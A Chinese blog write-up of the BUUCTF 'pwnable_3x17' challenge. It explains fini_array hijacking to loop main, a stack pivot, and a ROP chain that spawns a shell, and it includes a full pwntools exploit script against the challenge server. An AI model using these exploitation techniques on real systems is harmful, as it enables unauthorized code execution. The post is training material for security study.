(BUUCTF)pwnable_317

最新推荐文章于 2024-11-11 13:48:47 发布
最新推荐文章于 2024-11-11 13:48:47 发布
阅读量884 收藏 19
点赞数 22
分类专栏: pwn_writeup 文章标签: 网络安全 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/135487844
版权
文章讲述了如何通过劫持fini_array在静态编译环境中创建无限循环,使得main函数无限执行,然后利用任意地址写功能布置ROP链,最终获取shell。作者提供了详细的步骤和代码示例,展示了利用ropchain绕过控制条件的过程。
摘要由CSDN通过智能技术生成

文章目录

前置知识

  • 静态编译
  • 栈迁移
  • fini_array劫持

fini_array劫持

若只覆盖array[1]main_addr,那么只会执行一次main函数便会执行下一个array中的函数。

要无限执行某个函数,需要使用这个方式:

array[0]覆盖为__libc_csu_fini
array[1]覆盖为另一地址addrA

其中,start函数中的__libc_start_main函数的第一个参数为main函数地址
第四个参数为__libc_csu_init函数,在main函数开始前执行
第五个参数为__libc_csu_fini函数,在main函数结束时执行

这是因为默认情况下,fini数组中函数中存放的函数为:

array[0]:__do_global_dtors_aux
array[1]:fini

而在__libc_csu_fini函数中会调用这两个函数,其执行顺序为array[1] -> array[0]

修改后,其执行顺序将会变为:

main -> __libc_csu_fini -> addrA -> __libc_csu_fini -> addrA -> __libc_csu_fini ....

从而达到无限执行的目的。

终止条件即只要当array[0]不为__libc_csu_fini即可。

通过fini_array栈迁移来实现ROP

通过上面的无限循环方法执行某个函数时,若该函数可以进行一个任意地址写,那么我们便可以利用上述方式在array[2]处布置rop链。

布置完成后,布置fini_array为如下形式:

fini_array + 0x00: leave_ret (gadget)
fini_array + 0x08: ret (gadget)
fini_array + 0x10: ROP chain

由于本身执行的函数是存放于array[1]的,因此执行完后会执行array[0]处的leave_retgadget,导致ripret,然后执行我们布置的rop链。

参考文献

整体思路

题目是静态编译,我们可以在ida中通过shift+f12查看字符串表,并按x交叉引用找到main函数。通过交叉引用main函数可以找到_start函数,从而获得__libc_csu_init函数的地址和__libc_csu_fini函数的地址(分别为_start函数中__libc_start_main函数的第四个和第五个参数)。

查看程序,发现其有一个任意地址写,可以写0x18字节。有一个变量控制主程序的执行条件,为1的时候才能执行。

我们通过任意地址写来劫持fini_array数组(调一下获取地址),写array[0]__libc_csu_fini,写array[1]main_addr,从而完成无限执行main函数,而控制主程序执行条件的变量由于会无限执行,每次都会重新溢出为1,因此相当于不用管直接绕过。

然后通过任意写在array[2]位置处布置rop chain,最后在array[0]leave_retarray[1]ret触发rop获得shell

exp

from pwn import *
from LibcSearcher import *

filename = './3x17'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
# libc = ELF('')

if local:
    sh = process(filename)
else:
    sh = remote('node5.buuoj.cn', 28860)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)


def write(addr, data):
    sh.sendafter('addr:', str(addr))
    sh.sendafter('data:', data)


leave_ret_addr = 0x401c4b
syscall_ret_addr = 0x471db5
main_addr = 0x401b6d
start_addr= 0x401a50
libc_csu_fini = 0x402960
fini_array_addr = 0x4b40f0
pop_rdi_ret = 0x401696
pop_rsi_ret = 0x406c30
pop_rdx_ret = 0x446e35
pop_rax_ret = 0x41e4af
ret = 0x401016
bin_sh_addr = fini_array_addr + 8*11
rop_chain_addr = 0x4b4100

sh.sendafter('addr:', str(fini_array_addr))
sh.sendafter('data:', p64(libc_csu_fini) + p64(main_addr))

payload = [p64(pop_rax_ret), p64(59) , p64(pop_rdi_ret) , p64(bin_sh_addr), p64(pop_rsi_ret) , p64(0), p64(pop_rdx_ret), p64(0), p64(syscall_ret_addr), b'/bin/sh\x00']

for index, i in enumerate(payload):
    write(rop_chain_addr + index*8, i)

sh.sendafter('addr:', str(fini_array_addr))
sh.sendafter('data:', p64(leave_ret_addr) + p64(ret))

sh.interactive()
LtfallQwQ
关注
专栏目录
[pwnable] 3x17 分析与思考
Tokameine的博客
09-04 737
有点炫酷的利用方式,不得不承认,确实让我长见识了。 正文: void __fastcall __noreturn start(__int64 a1, __int64 a2, int a3) { __int64 v3; // rax int v4; // esi __int64 v5; // [rsp-8h] [rbp-8h] BYREF void *retaddr; // [rsp+0h] [rbp+0h] BYREF v4 = v5; v5 = v3; ...
pwnable.tw 3x17 经验总结
qq_43189757的博客
10-25 1008
这题涨姿势了, 学到了不少东西, 对静态链接的题目也有了一点了解 参考的wp: 和媳妇一起学pwn之3x17(不得不说这名字真的sao… , 不过文章写的挺好的 分析: 由于程序是静态编译的, 把符号表给剥离了, 所以无法直接找到main函数, 可以先观察程序的入口点start 在地址0x0000000000401A74处调用了一个函数, 而这个函数其实就是libc_start_main函数 l...
(格式化字符串漏洞).fini.array劫持,使程序流程循环进行
半岛铁盒的博客
04-04 926
用gdb调试main函数的时候,不难发现main的返回地址是__libc_start_main也就是说main并不是程序真正开始的地方,__libc_start_main的执行是在main的前面。 可以发现__libc_start_main函数的参数中,有3个是函数指针: 其中__libc_csu_fini是在main执行完毕后执行的 简单地说,在main函数后会调用.init段代码和.init_array段的函数数组中每一个函 数指针。而我们的目标就是修改.fini_array数组的第一个元素为star
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 350
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 400
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 292
BUUCTF 做题练习
BUUCTFpwnable_orw
qq_44768749的博客
08-27 1707
BUUCTFpwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1091
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4218
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
BUUCTFpwnable_bf
xy1458214551的博客
01-12 412
BUUCTFpwnable_bf题解
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 545
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 823
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8543
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
系统安全第七次作业题目及答案
XLYcmy的博客
11-10 720
一、1.RBAC0 RBAC1 RBAC2 RBAC32.属性 身份标识3.接入访问控制 资源访问控制 网络端口和节点的访问控制二、1.B2.A3.ABE4.BCD5.ABC三、1.答:基于属性的访问控制(ABAC)是通过对实体属性添加约束策略的方式实现主、客体之间的授权访问。ABAC模型以属性为最小的授权单位,替代基于角色的访问控制模型中以身份标识为依据的授权方式,以满足开放网络环境下资源访同控制的要求。根据信息系统预先定义的安全策略,对提出访间请求的主体,依据其拥有的属性特征集、客体特征属性集和相应的环
C++设计模式结构型模式———代理模式
无敌岩雀的博客
11-09 1061
代理模式的使用方式有很多,延迟初始化 (虚拟代理)。如果有一个偶尔使用的重量级服务对象, 一直保持该对象运行会消耗系统资源时, 可使用代理模式。无需在程序启动时就创建该对象, 可将对象的初始化延迟到真正有需要的时候。访问控制:如果你只希望特定客户端使用服务对象, 这里的对象可以是操作系统中非常重要的部分, 而客户端则是各种已启动的程序 (包括恶意程序), 此时可使用代理模式。代理可仅在客户端凭据满足要求时将请求传递给服务对象。代理模式和装饰模式有类似之处,但是这两个模式要解决的问题不同或者说立场不同。
信息安全工程师(83)Windows操作系统安全分析与防护
m0_73399576的博客
11-08 932
信息安全工程师——Windows操作系统安全分析与防护篇
系统架构设计师论文:论系统安全架构设计及其应用
最新发布
Programming Talk
11-11 137
我参与了一项名为“智慧医疗信息管理平台”的软件开发项目。该项目旨在构建一个集成化的医疗信息管理系统,为医疗机构提供病历管理、患者信息管理、医疗资源调度、电子处方、在线预约挂号等功能,旨在提高医疗服务效率和质量,同时保障医疗信息的机密性和完整性。
关于Flutter空安全升级方案整理
清风洒脱
11-08 936
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 1443
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 444
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值